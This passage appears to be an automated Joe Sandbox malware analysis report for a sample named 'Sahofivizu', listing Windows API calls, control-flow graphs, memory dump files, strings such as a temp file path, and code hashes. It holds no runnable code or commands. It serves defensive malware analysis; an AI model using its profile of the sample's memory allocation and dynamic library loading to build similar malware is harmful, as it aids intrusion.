            • HeapFree.KERNEL32(00000000,?,?), ref: 100016BE
            • HeapDestroy.KERNELBASE(?,?,10001448,1000148E,?,?,?), ref: 100016C6
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: Free$Heap$Virtual$Destroy
            • String ID:
            • API String ID: 782257640-0
            • Opcode ID: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
            • Instruction ID: 61a0c7697adea93b5fe945f8e2afc69d7dd1263472ae5ce1153fbc6210c6796e
            • Opcode Fuzzy Hash: 16c968df11c80f4839faa5dd0be9cb8f858190d9a875e5543b79e2ab491c8c70
            • Instruction Fuzzy Hash: 0FF06D36240225EFFA229F51CDCAF47BB61E7487E2F264020F340260B8CA737820DB18
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,100022C6,00000000,00000001,00000000), ref: 10002526
            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,100022C6,00000000,00000001,00000000), ref: 1000255A
            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004), ref: 10002574
            • HeapFree.KERNEL32(00000000,?), ref: 1000258B
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: Heap$Alloc$AllocateFreeVirtual
            • String ID:
            • API String ID: 1005975451-0
            • Opcode ID: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
            • Instruction ID: 8c717063115672bf0fc247caff50c072d0a3175c7713bb39a850b630715b60b1
            • Opcode Fuzzy Hash: dbe84276b22d936fcf28fe8366a40f9be5e16de133823684676681efb08bdf82
            • Instruction Fuzzy Hash: 03116A70200B62DFE721CF19CCC59177BB5FB893E27214619E266D61B8E7729895CF04
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 85 10001303-1000138d GetProcAddress * 2 LoadLibraryA
            APIs
            • GetProcAddress.KERNEL32(?,?,?,00000000,100051F0,10005274,10001058,00000000,100051F0), ref: 1000131E
            • GetProcAddress.KERNEL32(?,?), ref: 1000134B
            • LoadLibraryA.KERNEL32(?,?), ref: 10001367
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID:
            • API String ID: 2238633743-0
            • Opcode ID: a2a4460d8b42876672ffae12abd207b6d653eef4aa71be30f549fe1d26958614
            • Instruction ID: 6b4b563568a0099a7d313ee5757a75211569dd7bb91b6627a7ee3c4013f845ab
            • Opcode Fuzzy Hash: a2a4460d8b42876672ffae12abd207b6d653eef4aa71be30f549fe1d26958614
            • Instruction Fuzzy Hash: 7611E675200105EFD714CF28C894EA5BBE9FF58358B24846DEA59DB361CB32AD51CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • HeapCreate.KERNELBASE(00000000,00001000,00000000,100013AF,00000000), ref: 1000162F
              • Part of subcall function 10001E61: HeapAlloc.KERNEL32(00000000,00000140,10001643), ref: 10001E6E
            • HeapDestroy.KERNEL32 ref: 1000164D
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: Heap$AllocCreateDestroy
            • String ID:
            • API String ID: 2236781399-0
            • Opcode ID: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
            • Instruction ID: b44736f6baa83e7d6a93fb0d53bb776c116ce931ecf9813d38e3291ce07d1fa6
            • Opcode Fuzzy Hash: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
            • Instruction Fuzzy Hash: 9EE012707543119EFF504B308DC979636D5EB487C3F098425FA01C81BCEB71C540E615
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 96 4015e3-4015ea 97 4015f8-40160e __dllonexit 96->97 98 4015ec-4015f7 _onexit 96->98
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd
            Similarity
            • API ID: __dllonexit_onexit
            • String ID:
            • API String ID: 2384194067-0
            • Opcode ID: bdaf2b64863544c3b2515e46637725f58fd199791387d0c07701695bbfc004bc
            • Instruction ID: ca292e61e73f955b3a7a16f36ff4d915cd86340734f0e01b9fbe6593226695e0
            • Opcode Fuzzy Hash: bdaf2b64863544c3b2515e46637725f58fd199791387d0c07701695bbfc004bc
            • Instruction Fuzzy Hash: ABC012B4640310BBCA045721BE0A9553721A7D07B2B6047BEF265300F097B90A25F50D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 99 100025af-100025bf 100 100025c1-100025c3 99->100 101 100025c5-100025c8 100->101 102 100025ca-100025dc 100->102 101->100 103 100025df-100025e9 102->103 103->103 104 100025eb-10002608 VirtualAlloc 103->104 105 10002612-1000261a 104->105 106 1000260a-1000260d 104->106 108 10002658-10002690 105->108 109 1000261c 105->109 107 100026a5-100026a9 106->107 111 10002692 108->111 112 10002695-100026a3 108->112 110 1000261f-10002656 109->110 110->108 110->110 111->112 112->107
            APIs
            • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,-000000C9,?,100022D5,000000E0,00000000,00000001,00000000), ref: 10002600
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
            • Instruction ID: e8023bc93e902970d527dcdc1609af902be182bd13007913b083f88dc202a63d
            • Opcode Fuzzy Hash: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
            • Instruction Fuzzy Hash: DC31BE716016069FE314CF18C894BA5FBE4FF443A8F25C2BDE5598B2A2D771E946CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 113 100026e8-100026f3 114 10002700-10002702 113->114 115 100026f5-100026f6 call 100021f5 113->115 117 10002704-10002706 114->117 118 10002707-10002716 HeapAlloc 114->118 119 100026fb-100026fe 115->119 117->118 120 1000271c-1000271d 118->120 119->114 119->120
            APIs
            • HeapAlloc.KERNEL32(00000000,-0000000E,00000000,100026CC,000000E0,100026B9,00000001,10001CAB,00000001,?,?,?,?,?,?,100013F6), ref: 10002716
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: AllocHeap
            • String ID:
            • API String ID: 4292702814-0
            • Opcode ID: 05a360d2f0b3347189bce5f08380c6bcd7cef7050c63d3436c765e236448abe3
            • Instruction ID: 323c970e6e0f283b15a3e7abaa1b36c9a8ccdf6e68953bacb870ff952791e141
            • Opcode Fuzzy Hash: 05a360d2f0b3347189bce5f08380c6bcd7cef7050c63d3436c765e236448abe3
            • Instruction Fuzzy Hash: 37E08C32949531A6F511A318ACC07CB3754EB052F1F170111FD587A0ECC7212C4045C4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 190 21000-21012 malloc 191 21018-2103c wsprintfA 190->191 192 210ce-210ed _fullpath 190->192 191->192 193 21042-21050 191->193 194 21052-21054 193->194 195 210b0-210cd wsprintfA 194->195 196 21056-2105c 194->196 195->192 196->195 197 2105e 196->197 198 21060-21066 197->198 199 21068-210ae call 211c0 call 21100 197->199 198->195 198->199 199->194
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349465636.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
            • Associated: 00000002.00000002.349463065.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349468068.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349470440.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349472776.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_20000_Sahofivizu.jbxd
            Similarity
            • API ID: wsprintf$__allrem_fullpathmalloc
            • String ID: %sI%d4%s$C:\Users\user\AppData\Local\Temp\dfdfadf.tmp$dfdfadf.tmp
            • API String ID: 475258233-3781896646
            • Opcode ID: e81a1d83c9d12b52c22b9a004a07bebc555f53a1c847616e3a44fbb79a1cc2de
            • Instruction ID: e90cff05450bf6b2fe46e5ed2c1245e098adab761f0d4a44b46e96c27f180eb9
            • Opcode Fuzzy Hash: e81a1d83c9d12b52c22b9a004a07bebc555f53a1c847616e3a44fbb79a1cc2de
            • Instruction Fuzzy Hash: 6421AF76E40260ABF3309B54BCE5F9377A8F758750B240016FF0496261D2BE9B52DBB4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 204 10002fd5-10002fe0 205 10002fe2-10002ff1 LoadLibraryA 204->205 206 10003024-1000302b 204->206 207 10002ff3-10003008 GetProcAddress 205->207 208 1000305a-1000305c 205->208 209 10003043-1000304f 206->209 210 1000302d-10003033 206->210 207->208 212 1000300a-1000301f GetProcAddress * 2 207->212 211 10003056-10003059 208->211 209->211 210->209 214 10003035-1000303c 210->214 212->206 214->209 215 1000303e-10003041 214->215 215->209
            APIs
            • LoadLibraryA.KERNEL32(user32.dll), ref: 10002FE7
            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10002FFF
            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10003010
            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1000301D
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad
            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
            • API String ID: 2238633743-4044615076
            • Opcode ID: 1dbaeefd9ce97f4fa9637ee689c7f71a33f2da17464894628c8e9adf382b8011
            • Instruction ID: db44e2fe7c464d5a8d4b7f8e029df5005cf0b4a6e2234990c761226e46615e57
            • Opcode Fuzzy Hash: 1dbaeefd9ce97f4fa9637ee689c7f71a33f2da17464894628c8e9adf382b8011
            • Instruction Fuzzy Hash: FA018FB5602221AFF702CFB48CD4A5B7BECEB585D23425029F305D3128DF768A019B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 217 100034b0-100034de 218 100034e0-100034fa LCMapStringW 217->218 219 10003526-10003529 217->219 220 10003504-10003516 LCMapStringA 218->220 221 100034fc-10003502 218->221 222 1000353b-10003543 219->222 223 1000352b-10003538 call 100036d4 219->223 224 1000351c 220->224 225 1000363e 220->225 221->219 227 10003562-10003565 222->227 228 10003545-1000355d LCMapStringA 222->228 223->222 224->219 230 10003640-10003651 225->230 227->225 231 1000356b-1000356e 227->231 228->230 232 10003570-10003575 231->232 233 10003578-1000359c MultiByteToWideChar 231->233 232->233 233->225 234 100035a2-100035d6 call 10003a20 233->234 234->225 238 100035d8-100035ef MultiByteToWideChar 234->238 238->225 239 100035f1-1000360a LCMapStringW 238->239 239->225 240 1000360c-10003610 239->240 241 10003652-10003688 call 10003a20 240->241 242 10003612-10003615 240->242 241->225 249 1000368a-100036a0 LCMapStringW 241->249 243 1000361b-1000361e 242->243 244 100036cd-100036cf 242->244 243->225 246 10003620-10003638 LCMapStringW 243->246 244->230 246->225 246->244 249->225 250 100036a2-100036a7 249->250 251 100036a9-100036ab 250->251 252 100036ad-100036b0 250->252 253 100036b3-100036c7 WideCharToMultiByte 251->253 252->253 253->225 253->244
            APIs
            • LCMapStringW.KERNEL32(00000000,00000100,100043C0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 100034F2
            • LCMapStringA.KERNEL32(00000000,00000100,100043BC,00000001,00000000,00000000), ref: 1000350E
            • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10003557
            • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 1000358F
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 100035E7
            • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 100035FD
            • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 10003630
            • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10003698
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: String$ByteCharMultiWide
            • String ID:
            • API String ID: 352835431-0
            • Opcode ID: dbe830df0763fc8bee7db807de57661d9d77bbfedc854cc939856680204d9edb
            • Instruction ID: 4b6d027f73fa19145a5f3e1c53e93e680a39882d1d293be763fa309d5391f777
            • Opcode Fuzzy Hash: dbe830df0763fc8bee7db807de57661d9d77bbfedc854cc939856680204d9edb
            • Instruction Fuzzy Hash: 81517872900249FBEF22CF95CC84A9F7BB9FB487D0F118119FA14A1268D7329A50DB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 10001D7B
            • GetStdHandle.KERNEL32(000000F4,100042F4,00000000,?,00000000,00000000), ref: 10001E51
            • WriteFile.KERNEL32(00000000), ref: 10001E58
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: File$HandleModuleNameWrite
            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
            • API String ID: 3784150691-4022980321
            • Opcode ID: e6a121d48861eb785d742d214c72ab0c014cff8c06758f892024061719bbc7c5
            • Instruction ID: 401661fd5ab9cabd625a3dc97299db880e9a28a686874f8926fb39faa29cc82c
            • Opcode Fuzzy Hash: e6a121d48861eb785d742d214c72ab0c014cff8c06758f892024061719bbc7c5
            • Instruction Fuzzy Hash: E931CFB2A00218AFFF20DBA0CD85FDE73BDEB453C1F510466F644E6058EB70AA448B51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001BBE
            • GetEnvironmentStrings.KERNEL32(?,?,?,?,100013F6), ref: 10001BD2
            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001BFE
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,100013F6), ref: 10001C36
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100013F6), ref: 10001C58
            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100013F6), ref: 10001C71
            • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,100013F6), ref: 10001C84
            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10001CC2
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
            • String ID:
            • API String ID: 1823725401-0
            • Opcode ID: f2918a94f17886a19cbf868265f1ef6e6d0018226b6bb258aafe37188c77b7c3
            • Instruction ID: b5758dbbf37d0a68a6d2fbbe3b6386a9ccfe2942eff6862e6cb0508b33c02b1e
            • Opcode Fuzzy Hash: f2918a94f17886a19cbf868265f1ef6e6d0018226b6bb258aafe37188c77b7c3
            • Instruction Fuzzy Hash: 5231F4B25882666FF310EFB85CC8CAF76DCEB452C47130929FA45D3249EA71DC8187A5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetStringTypeW.KERNEL32(00000001,100043C0,00000001,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000373E
            • GetStringTypeA.KERNEL32(00000000,00000001,100043BC,00000001,?), ref: 10003758
            • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000378C
            • MultiByteToWideChar.KERNEL32(10002B99,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 100037C4
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 1000381A
            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 1000382C
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: StringType$ByteCharMultiWide
            • String ID:
            • API String ID: 3852931651-0
            • Opcode ID: f64cdc7b7fa6c42fbe7f8f5f482f442825ff80c86c4570330c8ea04e2d4c557e
            • Instruction ID: c106d8dc8ad574b061a9a187b1fe70b75c126725d83857f186d77a87e2c8d252
            • Opcode Fuzzy Hash: f64cdc7b7fa6c42fbe7f8f5f482f442825ff80c86c4570330c8ea04e2d4c557e
            • Instruction Fuzzy Hash: 3E418CB190425AAFEB22CF98DC85EDF7BBCFB086D0F118525FA15E2254D7319910CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: FileHandleType$CountInfoStartup
            • String ID:
            • API String ID: 1710529072-0
            • Opcode ID: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
            • Instruction ID: 494b5648a00b6ebd18262675c163e6e7080ce7139c4e1f1a5e36cb56f91cab08
            • Opcode Fuzzy Hash: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
            • Instruction Fuzzy Hash: F451D6719082558BF321CB28CC887863BE5FB053E1F5A8768E49A9B2E9DB309945C751
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349512027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.349509506.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349514776.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349517219.0000000000403000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000002.00000002.349519601.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_Sahofivizu.jbxd
            Similarity
            • API ID: getenvmalloc
            • String ID: 00@$TEMP
            • API String ID: 3016273935-1863785868
            • Opcode ID: e5752d7e964cc45001351181cb80afe316824892046b893d0cd7ffa74a926f00
            • Instruction ID: 17352a3b23e8b41dd4c3654eb86734d26610b7628fbd5f895abf2d9db2bed888
            • Opcode Fuzzy Hash: e5752d7e964cc45001351181cb80afe316824892046b893d0cd7ffa74a926f00
            • Instruction Fuzzy Hash: F7318DB17052058BC718DF5AEE8006ABBEAE7C83A1B54027FF745A73B0D7758C458B88
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349477708.0000000000031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true
            • Associated: 00000002.00000002.349475197.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
            • Associated: 00000002.00000002.349480216.0000000000032000.00000002.00000001.01000000.00000008.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_30000_Sahofivizu.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: aaa691ac5fd9f91e05aeb056c63f31f7cb1ec05e37e08a05c2c227dbbda0be8e
            • Instruction ID: 13b689dde038f77e4c4977206f0877c0701b6f0d20176e13f6d107654d309145
            • Opcode Fuzzy Hash: aaa691ac5fd9f91e05aeb056c63f31f7cb1ec05e37e08a05c2c227dbbda0be8e
            • Instruction Fuzzy Hash: 14112E31608241DBF76FCB65EDE4BD677BCA709711F104419EA01C6160DB69DA48DF14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349465636.0000000000021000.00000020.00000001.01000000.00000007.sdmp, Offset: 00020000, based on PE: true
            • Associated: 00000002.00000002.349463065.0000000000020000.00000002.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349468068.0000000000022000.00000002.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349470440.0000000000023000.00000004.00000001.01000000.00000007.sdmpDownload File
            • Associated: 00000002.00000002.349472776.0000000000024000.00000002.00000001.01000000.00000007.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_20000_Sahofivizu.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: 7068a5bc0ea4ce6263cfe8236628994a315b2e641dedb9b323be42eef17fcd8b
            • Instruction ID: a6225d14362a5a66cbb371df82a878d36f6afbcff67eb9e9200332e41d30c974
            • Opcode Fuzzy Hash: 7068a5bc0ea4ce6263cfe8236628994a315b2e641dedb9b323be42eef17fcd8b
            • Instruction Fuzzy Hash: E1112E31604321DBF7748FA8FC95BA677A9B725311B70041AF401DA1A0DB2D9A66CB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349490851.00000000001B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001B0000, based on PE: true
            • Associated: 00000002.00000002.349488449.00000000001B0000.00000002.00000001.01000000.00000009.sdmpDownload File
            • Associated: 00000002.00000002.349493345.00000000001B2000.00000002.00000001.01000000.00000009.sdmpDownload File
            • Associated: 00000002.00000002.349495824.00000000001B4000.00000002.00000001.01000000.00000009.sdmpDownload File
